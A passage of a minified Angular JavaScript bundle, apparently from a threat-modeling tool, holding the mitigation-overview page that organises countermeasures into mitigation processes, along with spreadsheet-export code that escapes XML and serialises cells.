.splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.chartDark[_ngcontent-%COMP%]     .ngx-charts text{fill:#fff!important}"]}),t})(),_2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,f2t,AZ,S7]}),t})();function g2t(t,a){if(1&t&&(m(0,"h2"),s(1),u()),2&t){const e=B();C(1),ke(e.selectedNode.name())}}function C2t(t,a){if(1&t){const e=Ye();m(0,"app-mitigation-process",13),he("countermeasuresChange",function(){return be(e),Me(B().OnMappingProcessChange())}),u()}2&t&&V("mitigationProcess",B().selectedNode.data)}function y2t(t,a){if(1&t){const e=Ye();m(0,"app-countermeasure",14),he("mitigationProcessChange",function(){return be(e),Me(B().OnMappingProcessChange())}),u()}2&t&&V("countermeasure",B().selectedNode.data)}function b2t(t,a){if(1&t&&(m(0,"option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetMitigationProcessStateName(e)))}}function M2t(t,a){if(1&t){const e=Ye();m(0,"select",21),he("ngModelChange",function(n){return be(e),Me(B().$implicit.data.MitigationProcessState=n)}),s(1,"\n                        "),ne(2,b2t,3,4,"option",22),s(3,"\n                      "),u()}if(2&t){const e=B().$implicit,i=B(2);V("ngModel",e.data.MitigationProcessState),C(2),V("ngForOf",i.GetMitigationProcessStates())}}function v2t(t,a){1&t&&it(0,"mat-progress-bar",24),2&t&&V("value",B().$implicit.data.Progress)}function A2t(t,a){if(1&t&&(bt(0),s(1),m(2,"span",25),s(3,"/"),u(),s(4),oe(5,"translate"),Mt()),2&t){const e=B().$implicit,i=B(2);C(1),ke(i.GetCheckedTasks(e.data.Tasks)),C(3),za("",e.data.Tasks.length," ",re(5,3,"general.Tasks"),"")}}function T2t(t,a){if(1&t&&(bt(0),s(1),oe(2,"translate"),Mt()),2&t){const e=B().$implicit;C(1),za("",e.data.Notes.length," ",re(2,2,"general.Notes"),"")}}function E2t(t,a){if(1&t&&(m(0,"option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(4);V("value",e),C(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function D2t(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n                    "),m(2,"td")(3,"mat-icon"),s(4,"remove"),u()(),s(5,"\n                    "),m(6,"td"),s(7),u(),s(8,"\n                    "),m(9,"td",16),s(10,"\n                      "),m(11,"select",21),he("ngModelChange",function(n){return Me(be(e).$implicit.data.MitigationState=n)}),s(12,"\n                        "),ne(13,E2t,3,4,"option",22),s(14,"\n                      "),u(),s(15,"\n                    "),u(),s(16,"\n                  "),u()}if(2&t){const e=a.$implicit,i=B(3);C(7),ke(e.name()),C(4),V("ngModel",e.data.MitigationState),C(2),V("ngForOf",i.GetMitigationStates())}}function x2t(t,a){if(1&t&&(bt(0),s(1,"\n                  "),m(2,"tr"),s(3,"\n                    "),m(4,"td")(5,"mat-icon"),s(6,"arrow_right"),u()(),s(7,"\n                    "),m(8,"td"),s(9),u(),s(10,"\n                    "),m(11,"td",16),s(12,"\n                      "),ne(13,M2t,4,2,"select",17),s(14,"\n                    "),u(),s(15,"\n                    "),m(16,"td"),ne(17,v2t,1,1,"mat-progress-bar",18),u(),s(18,"\n                    "),m(19,"td",16),ne(20,A2t,6,5,"ng-container",10),u(),s(21,"\n                    "),m(22,"td"),ne(23,T2t,3,4,"ng-container",10),u(),s(24,"\n                  "),u(),s(25,"\n                  "),ne(26,D2t,17,3,"tr",15),s(27,"\n                  "),m(28,"tr",19),it(29,"td",20),u(),s(30,"\n                "),Mt()),2&t){const e=a.$implicit;C(9),ke(e.name()),C(4),V("ngIf",e.data),C(4),V("ngIf",e.data),C(3),V("ngIf",e.data),C(3),V("ngIf",e.data),C(3),V("ngForOf",e.children)}}function w2t(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"table"),s(3,"\n                "),ne(4,x2t,31,6,"ng-container",15),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B();C(4),V("ngForOf",e.selectedNode.children)}}Ds(yf,[Zi,Ri,pm,_m,Td,Ta,Ea,Zh,xp,oa,da,Xa,wl,Xo,qo,po,Zc,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,hA,SZ],[Xi]);const I2t=[{path:"mitigation",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.translate=n,this.locStorage=r,this.dialog=c,this.router=d,this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"mitigation"}})}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}ngOnInit(){setTimeout(()=>{this.createNodes(),this.selectedNode=this.nodes[0]},100)}IsProcess(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof zp}IsMapping(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Jl}OnMappingProcessChange(){let e=this.selectedNode.data;e&&(this.createNodes(),this.selectedNode=xa.FindNodeOfObject(e,this.nodes))}GetCheckedTasks(e){return e.filter(i=>i.IsChecked).length}GetMitigationProcessStates(){return C2.GetMitigationStates()}GetMitigationProcessStateName(e){return C2.ToString(e)}GetMitigationStates(){return al.GetMitigationStates()}GetMitigationStateName(e){return al.ToString(e)}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_MITIGATION_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_MITIGATION_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.nodes;this.nodes=[];const i=this.dataService.Project,n=(k,q)=>{let Y={name:()=>"CM"+k.Number+") "+k.Name,canSelect:!0,data:k,canRename:!1,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(te=>{te&&(i.DeleteCountermeasure(k),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{var te;let pe=i.GetCountermeasures(),Re=null===(te=q.children)||void 0===te?void 0:te.map(Ne=>Ne.data),Fe=Re.findIndex(Ne=>Ne.ID==k.ID);if(0!=Fe){let Ne=pe.findIndex(et=>et.ID==Re[Fe-1].ID);i.MoveItemCountermeasures(pe.findIndex(et=>et.ID==k.ID),Ne),q.children.splice(Fe,0,q.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{var te;let pe=i.GetCountermeasures(),Re=null===(te=q.children)||void 0===te?void 0:te.map(Ne=>Ne.data),Fe=Re.findIndex(Ne=>Ne.ID==k.ID);if(Fe!=Re.length-1){let Ne=pe.findIndex(et=>et.ID==Re[Fe+1].ID);i.MoveItemCountermeasures(pe.findIndex(et=>et.ID==k.ID),Ne),q.children.splice(Fe,0,q.children.splice(Fe+1,1)[0])}}};return Y},r=(k,q)=>{let Y={name:()=>"MP"+k.Number+") "+k.Name,canSelect:!0,data:k,canRename:!1,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(k).subscribe(te=>{te&&(i.DeleteMitigationProcess(k),this.selectedNode==Y&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let te=i.GetMitigationProcesses();const pe=te.findIndex(Re=>Re.ID==k.ID);if(0!=pe){te.splice(pe,0,te.splice(pe-1,1)[0]);const Re=q.children.findIndex(Fe=>Fe.data==k);q.children.splice(Re,0,q.children.splice(Re-1,1)[0])}},onMoveDown:()=>{let te=i.GetMitigationProcesses();const pe=te.findIndex(Re=>Re.ID==k.ID);if(pe!=te.length-1){te.splice(pe,0,te.splice(pe+1,1)[0]);const Re=q.children.findIndex(Fe=>Fe.data==k);q.children.splice(Re,0,q.children.splice(Re+1,1)[0])}},children:[]};return i.GetCountermeasures().filter(te=>te.MitigationProcess==k).forEach(te=>Y.children.push(n(te,Y))),Y},c={name:()=>this.translate.instant("pages.modeling.mitigationoverview.MitigationProcesses"),icon:"security",canSelect:!0,canAdd:!0,hasMenu:!0,onAdd:()=>{let k=i.CreateMitigationProcess();this.createNodes(),this.selectedNode=xa.FindNodeOfObject(k,this.nodes),setTimeout(()=>{document.dispatchEvent(new KeyboardEvent("keydown",{key:"F2"}))},250)},children:[]},d={name:()=>this.translate.instant("pages.modeling.mitigationoverview.NotAssignedCountermeasures"),canSelect:!1,children:[]};i.GetCountermeasuresApplicable().filter(k=>null==k.MitigationProcess).forEach(k=>d.children.push(n(k,d))),d.children.length>0&&c.children.push(d);const T={name:()=>this.translate.instant("pages.modeling.mitigationoverview.RejectedCountermeasures"),canSelect:!1,children:[],isExpanded:!1};i.GetCountermeasuresNotApplicable().filter(k=>null==k.MitigationProcess).forEach(k=>T.children.push(n(k,T))),T.children.length>0&&c.children.push(T),i.GetMitigationProcesses().forEach(k=>c.children.push(r(k,c))),this.nodes.push(c),xa.TransferExpandedState(e,this.nodes),this.navTree.SetNavTreeData(this.nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(_r),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-mitigation-overview"]],features:[ci],decls:39,vars:24,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/mitigation",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"margin","10px"],[4,"ngIf"],["style","height: 100%;",3,"mitigationProcess","countermeasuresChange",4,"ngIf"],["style","height: 100%;",3,"countermeasure","mitigationProcessChange",4,"ngIf"],[2,"height","100%",3,"mitigationProcess","countermeasuresChange"],[2,"height","100%",3,"countermeasure","mitigationProcessChange"],[4,"ngFor","ngForOf"],[2,"padding","0 10px"],["style","width: 130px;",3,"ngModel","ngModelChange",4,"ngIf"],["class","disable","color","primary","style","width: 100px; margin-right: 3px;",3,"value",4,"ngIf"],[2,"height","20px"],["colspan","6"],[2,"width","130px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["color","primary",1,"disable",2,"width","100px","margin-right","3px",3,"value"],[2,"letter-spacing","2px"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"div",9),s(22,"\n            "),ne(23,g2t,2,1,"h2",10),s(24,"\n            "),ne(25,C2t,1,1,"app-mitigation-process",11),s(26,"\n            "),ne(27,y2t,1,1,"app-countermeasure",12),s(28,"\n            "),ne(29,w2t,7,1,"ng-container",10),s(30,"\n          "),u(),s(31,"\n        "),u(),s(32,"\n      "),u(),s(33,"\n    "),u(),s(34,"\n  "),u(),s(35,"\n  "),it(36,"app-status-bar"),s(37,"\n"),u(),s(38,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(4),V("ngIf",i.selectedNode),C(2),V("ngIf",i.IsProcess()),C(2),V("ngIf",i.IsMapping()),C(2),V("ngIf",i.selectedNode&&null==i.selectedNode.data))},dependencies:[Zi,Ri,pm,_m,Td,Ta,Ea,Zh,xp,oa,_u,gu,Od,hA,_f,gf,df,cM,_T,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})()}];let R2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,bs.forChild(I2t),bs]}),t})(),S2t=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,pf,R2t,k7]}),t})();var ma=de(4594),k2t=de(5818),P2t=de.n(k2t),O2t=de(7040);function kZ(t,a){var e=a.attribute;return t=t.replace(F2t,"&amp;").replace(V2t,"&gt;").replace(B2t,"&lt;"),e&&(t=t.replace(H2t,"&apos;").replace(U2t,"&quot;")),t}var F2t=/&/g,V2t=/>/g,B2t=/</g,H2t=/'/g,U2t=/"/g,q2t=/((?:[\0-\x08\x0B\f\x0E-\x1F\uFFFD\uFFFE\uFFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]))/g,G2t=new RegExp("([\\x7F-\\x84]|[\\x86-\\x9F]|[\\uFDD0-\\uFDEF]|(?:\\uD83F[\\uDFFE\\uDFFF])|(?:\\uD87F[\\uDFFE\\uDFFF])|(?:\\uD8BF[\\uDFFE\\uDFFF])|(?:\\uD8FF[\\uDFFE\\uDFFF])|(?:\\uD93F[\\uDFFE\\uDFFF])|(?:\\uD97F[\\uDFFE\\uDFFF])|(?:\\uD9BF[\\uDFFE\\uDFFF])|(?:\\uD9FF[\\uDFFE\\uDFFF])|(?:\\uDA3F[\\uDFFE\\uDFFF])|(?:\\uDA7F[\\uDFFE\\uDFFF])|(?:\\uDABF[\\uDFFE\\uDFFF])|(?:\\uDAFF[\\uDFFE\\uDFFF])|(?:\\uDB3F[\\uDFFE\\uDFFF])|(?:\\uDB7F[\\uDFFE\\uDFFF])|(?:\\uDBBF[\\uDFFE\\uDFFF])|(?:\\uDBFF[\\uDFFE\\uDFFF])(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF]))","g");function PZ(t){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},e=a.removeDiscouragedCharacters,i=void 0===e||e;return t=t.replace(q2t,""),i&&(t=t.replace(G2t,"")),t}function OZ(t){return kZ(PZ(t),{attribute:!1})}function XT(t,a){return"".concat(LZ(t)).concat(a)}function LZ(t){if("number"!=typeof t)return"";var a=Math.floor(t/26),e=String.fromCharCode(97+t%26).toUpperCase();return 0===a?e:LZ(a-1)+e}function zZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function tCt(t,a,e,i,n,r){if(null===e&&!n)return"";var c='<c r="'.concat(XT(a,t),'"');if(n&&(c+=' s="'.concat(n,'"')),null===e)return c+"/>";if(i===Date&&!n)throw new Error('No "format" has been specified for a Date cell');e=function aCt(t,a,e){switch(t){case String:if("string"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a string"));return e(a);case Number:if("number"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a number"));return String(a);case Date:if(!(a instanceof Date))throw new Error("Invalid cell value: ".concat(a,". Expected a Date"));return String(function K2t(t){return t.getTime()/864e5+25569}(a));case Boolean:if("boolean"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a boolean"));return a?"1":"0";case"Formula":if("string"!=typeof a)throw new Error("Invalid cell value: ".concat(a,". Expected a string"));return OZ(a);default:throw new Error("Unknown schema type: ".concat(t&&t.name||t))}}(i,e,r),i=function iCt(t){switch(t){case String:return"s";case Number:case Date:return;case Boolean:return"b";case"Formula":return"f";default:throw new Error("Unknown schema type: ".concat(t&&t.name||t))}}(i),i&&(c+=' t="'.concat(i,'"'));var d=function oCt(t){var a=function rCt(t){switch(t){case"inlineStr":return"<is><t>";case"f":return"<f>";default:return"<v>"}}(t),e=a.replace(nCt,"</");return[a,e]}(i),T=function X2t(t,a){return function eCt(t){if(Array.isArray(t))return t}(t)||function Z2t(t,a){var e=null==t?null:"undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(null!=e){var c,d,i=[],n=!0,r=!1;try{for(e=e.call(t);!(n=(c=e.next()).done)&&(i.push(c.value),!a||i.length!==a);n=!0);}catch(T){r=!0,d=T}finally{try{!n&&null!=e.return&&e.return()}finally{if(r)throw d}}return i}}(t,a)||function J2t(t,a){if(t){if("string"==typeof t)return zZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return zZ(t,a)}}(t,a)||function Y2t(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}()}(d,2);return c+">"+T[0]+e+T[1]+"</c>"}var nCt=/</g;function WZ(t){var a=t.align,e=t.alignVertical,i=t.fontFamily,n=t.fontSize,r=t.fontWeight,c=t.fontStyle,d=t.wrap,T=t.color,k=t.backgroundColor,q=t.borderColor,Y=t.borderStyle,te=t.leftBorderColor,pe=t.leftBorderStyle,Re=t.rightBorderColor,Fe=t.rightBorderStyle,Ne=t.topBorderColor,et=t.topBorderStyle,ut=t.bottomBorderColor,Ze=t.bottomBorderStyle;if(a||e||i||n||r||c||d||T||k||q||Y||te||pe||Re||Fe||Ne||et||ut||Ze)return function sCt(t){var a={};for(var e in t)void 0!==t[e]&&(a[e]=t[e]);return a}({align:a,alignVertical:e,fontFamily:i,fontSize:n,fontWeight:r,fontStyle:c,wrap:d,color:T,backgroundColor:k,borderColor:q,borderStyle:Y,leftBorderColor:te,leftBorderStyle:pe,rightBorderColor:Re,rightBorderStyle:Fe,topBorderColor:Ne,topBorderStyle:et,bottomBorderColor:ut,bottomBorderStyle:Ze})}function P7(t){return(P7="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(a){return typeof a}:function(a){return a&&"function"==typeof Symbol&&a.constructor===Symbol&&a!==Symbol.prototype?"symbol":typeof a})(t)}function FZ(t,a){var e=Object.keys(t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(t);a&&(i=i.filter(function(n){return Object.getOwnPropertyDescriptor(t,n).enumerable})),e.push.apply(e,i)}return e}function O7(t){for(var a=1;a<arguments.length;a++){var e=null!=arguments[a]?arguments[a]:{};a%2?FZ(Object(e),!0).forEach(function(i){mCt(t,i,e[i])}):Object.getOwnPropertyDescriptors?Object.defineProperties(t,Object.getOwnPropertyDescriptors(e)):FZ(Object(e)).forEach(function(i){Object.defineProperty(t,i,Object.getOwnPropertyDescriptor(e,i))})}return t}function mCt(t,a,e){return a in t?Object.defineProperty(t,a,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[a]=e,t}function VZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}var pCt={fontWeight:"bold"};function gCt(t,a){if(!t||(t.type===Date&&!t.width&&(t.width=14),!t.width))return"";var e=a+1;return'<col min="'.concat(e,'" max="').concat(e,'" width="').concat(t.width,'" customWidth="1"/>')}function bCt(t){var a=t.data,e=t.rowIndex,i=t.columnIndex,n=t.span,r=t.rowSpan,c=t.cloneData,d=WZ(a[e][i]);d&&(a=c());for(var T=e;T<=e+(r-1);){for(var k=i;k<=i+(n-1);){var q=a[T][k];if(T>e||k>i){if(null!=q)throw new Error("[write-excel-file] When using `span` or `rowSpan` parameters, all hidden overlapped cells should be represented by `null`s or `undefined`s. Cell at row ".concat(e+1," and column ").concat(i+1," is configured with `span` ").concat(n," and `rowSpan` ").concat(r,". Cell at row ").concat(T+1," and column ").concat(k+1," is neither `null` nor `undefined`: ").concat(JSON.stringify(q)));d&&(a[T][k]=d)}k++}T++}}function BZ(t,a){(null==a||a>t.length)&&(a=t.length);for(var e=0,i=new Array(a);e<a;e++)i[e]=t[e];return i}function bf(t){return kZ(PZ(t),{attribute:!0})}function RCt(t,a){var e=a.schema,i=a.columns,n=a.headerStyle,r=a.getStyle,c=a.getSharedString,d=a.customFont,T=a.dateFormat,k=a.orientation,q=a.stickyRowsCount,Y=a.stickyColumnsCount,te=a.sheetId;!function SCt(t,a){if(a.schema){if(!Array.isArray(t))throw new TypeError("Expected an array of objects")}else{if(!Array.isArray(t))throw new TypeError("Expected an array of arrays");if(t.length>0&&!Array.isArray(t[0]))throw new TypeError("Expected an array of arrays")}}(t,{schema:e});var pe=function yCt(t,a){var i=[];if(a.schema)return{data:t,mergedCells:i};for(var n=function(){t=t.slice();for(var Re=0;Re<t.length;)t[Re]=t[Re].slice(),Re++;return n=function(){return t},t},r=0;r<t.length;){for(var c=t[r],d=0;d<c.length;){var T=c[d];if(T){var k=T.span,q=void 0===k?1:k,Y=T.rowSpan,te=void 0===Y?1:Y;(q>1||te>1)&&(bCt({data:t,rowIndex:r,columnIndex:d,span:q,rowSpan:te,cloneData:n}),i.push([[r,d],[r+(te?te-1:0),d+(q?q-1:0)]]))}d++}r++}return{data:t,mergedCells:i}}(t,{schema:e}),Fe=pe.mergedCells;return'<?xml version="1.0" ?>\n<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:mx="http://schemas.microsoft.com/office/mac/excel/2008/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">{views}{columnsDescription}<sheetData>{data}</sheetData>{mergedCellsDescription}{layout}</worksheet>'.replace("{data}",function fCt(t,a){var e=a.schema,i=a.headerStyle,n=a.getStyle,r=a.getSharedString,c=a.customFont,d=a.dateFormat;if(e){for(var q,T=[],k=function uCt(t,a){var e="undefined"!=typeof Symbol&&t[Symbol.iterator]||t["@@iterator"];if(e)return(e=e.call(t)).next.bind(e);if(Array.isArray(t)||(e=function hCt(t,a){if(t){if("string"==typeof t)return VZ(t,a);var e=Object.prototype.toString.call(t).slice(8,-1);if("Object"===e&&t.constructor&&(e=t.constructor.name),"Map"===e||"Set"===e)return Array.from(t);if("Arguments"===e||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(e))return VZ(t,a)}}(t))||a&&t&&"number"==typeof t.length){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}(e);!(q=k()).done;)if(q.value.column){T=[e.map(function(te){return O7({type:String,value:te.column,align:te.align},i||pCt)})];break}t=T.concat(t.map(function(te){return e.map(function(pe){return O7(O7({},pe),{},{value:pe.value(te)})})}))}return t.map(function(te,pe){return function cCt(t,a,e){var k,i=e.getStyle,n=e.getSharedString,r=e.customFont,c=e.dateFormat,d=e.usesSchema,T=a+1,q=t.map(function(Y,te){if(null==Y)return"";var ut,pe=Y.height,Re=WZ(Y),Fe=Y.type,Ne=Y.value,et=Y.format;if(function lCt(t){return null==t||""===t}(Ne)?Ne=null:void 0===Fe&&(d||(Fe=function dCt(t){switch(P7(t)){case"string":return String;case"number":return Number;case"boolean":return Boolean;default:if(t instanceof Date)return Date}}(Ne)),void 0===Fe&&(Fe=String,Ne=String(Ne))),et){if(Fe!==Date&&Fe!==Number&&"Formula"!==Fe)throw new Error('`format` can only be used on `Date`, `Number` or `"Formula"` cells')}else Fe===Date&&(et=c);return(et||r||Re)&&(ut=i(Re||{},{format:et})),pe&&(void 0===k||k<pe)&&(k=pe),tCt(T,te,Ne,Fe,ut,n)}).join("");return'<row r="'.concat(T,'"')+(k?' ht="'.concat(k,'" 